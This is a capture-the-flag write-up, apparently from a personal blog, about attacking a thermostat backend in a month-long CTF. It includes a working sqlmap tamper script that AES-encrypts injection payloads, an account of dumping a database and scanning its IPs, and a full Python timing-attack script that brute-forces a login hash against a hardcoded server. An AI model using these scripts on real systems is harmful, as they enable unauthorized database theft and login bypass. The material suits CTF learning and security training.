from lib.core.enums import PRIORITY
import urllib

__priority__ = PRIORITY.LOW

BLOCK_SIZE = 16
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE)
* chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)

def dependencies():
pass

def tamper(payload, **kwargs):
retVal = payload
password = b'\x38\x4f\x2e\x6a\x1a\x05\xe5\x22\x3b\x80\xe9\x60\xa0\xa6\x50\x74'
retVal = "{\"username\":\"" + retVal +
"\",\"password\":\"1\",\"cmd\":\"getTemp\"}"
retVal = pad(retVal)
iv = Random.new().read(AES.block_size)
cipher = AES.new(password, AES.MODE_CBC, iv)
retVal = retVal.encode('ascii', 'ignore')
retVal = base64.b64encode(iv +
cipher.encrypt(retVal)).decode('utf-8')
retVal = retVal.replace('/', '%2F').replace('+',
'%2B').replace('=', '%3D')
return retVal

I let sqlmap run overnight and next morning it had dumped the whole database for me. One of the tables in the database was called ‘devices’ which included a list of 151 IP addresses. Most of those were LAN IPs (192.*.*.*), so I used sed to remove those and were left with a list of just 52 ‘real’ IPs. Feeding this list to nmap gave me just one working IP, which I did a full scan of.

Step 3

Visiting the URL on port 80 presented me with yet another login screen, and the site appeared to be the backend for the Android Thermostat app. I tried the usual stuff, weak login credentials (admin/password didn’t work here!), ran wfuzz to look for interesting pages, etc. The login function used a javascript to hash the username and password with a custom hashing algorithm using lots of XORs. It appeared quite daunting to me as I have no programming or IT background at all.

At this point I left the CTF for some days, not really knowing how to proceed. I did notice one interesting thing though: when dumping the database earlier, apart from the ‘devices’ table, there was a table with just two usernames and their hashed password. The admin password was hashed using MD5 and I was able to crack it (I already knew the password), but the password of user ‘test’ was encrypted using the custom hash of the backend login form. By pure chance I noticed that by trying to login as test:test the hash was equal to the one found in the database. I thought I’d stumbled upon the login by pure chance, but it turned out this was just another red herring.

I talked to another hacker Checkm50 who was well ahead of me in the CTF, and he hinted that I should look into timing attacks. I did some tests on the login and noticed that by systematically changing the first byte of the hash, one in 256 bytes took around half a second longer to get a reply from the server. I threw together a script to exploit this, but then realised that if each successive correct byte took half a second longer, this attack would take a LONG time.

 # Script to perform time-based attack on the 50m-CTF login. 
from collections import defaultdict
import requests
import numpy as np
import datetime

url = 'http://104.196.12.98/'
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
string =
'f9865a4952a4f5d74b43f3558fed6a0225c6877fba60a250bcbde753f5db1300'
results = defaultdict(list)

print('Starting login timing attack at ' +
str(datetime.datetime.now()) + '. \n')

for j in range(5): # Number of iterations
for i in range(256): # Cycle through all 256 bytes
payload = string[:2] + "%0.2x" % i + string[4:]
data = 'hash=' + payload
req = requests.post(url, headers=headers, data=data)
results[i].append(req.elapsed.total_seconds())
print('Cycle ' + str(j) + ' complete at ' +
str(datetime.datetime.now()) + '. \n')
j += 1

for key in results:
result = np.mean(results[key])
if result > (1.5): # Adjust this number
print(str("%0.2x" % key) + ': ' + str(result))

print('##########################################################\n')

The script required a lot of manual intervention. I let it run for 2-3 iterations of all possible 256 bytes since the timing fluctuated a little, and it wasn’t always clear which byte took 500ms longer. The first iterations took just a few minutes, but due to the 500ms delay for each correct byte, the last bytes took over an hour for each iteration! After about 3 days I was able to extract the correct login hash and log in.

Step 4

I had already run wfuzz on the site, so I knew what pages existed. I couldn’t get in to /diagnostics even though I was logged in, so I only had /control and /update to work with. Visiting /update the page tried to contact a fictitious server on port 5000 and failed. Doing some guessing on the URL parameters, I was quickly able to find that by adding ?port=80 to the URL the page used that port instead. Great! Now I only needed to find the parameter to change the URL.
Which again turned out to be harder than I imagined…..

Once again with some hints from hacker Checkm50 and an official hint on Twitter I was able to part guess, part bruteforce, the parameter for the URL. I supplied it my own IP, booted up my Raspberry Pi server, and… nothing. No traffic. Of course it wouldn’t be this easy!

At this point the CTF had run for almost a month, and the next day I woke up to the news that it had ended, and the server taken off line.
To be honest I probably wouldn’t have finished it anyway, it was quickly reaching a level way over my skill level. Still, I’m very glad to have participated, I learned a lot and actually got much farther than I would ever have dreamed.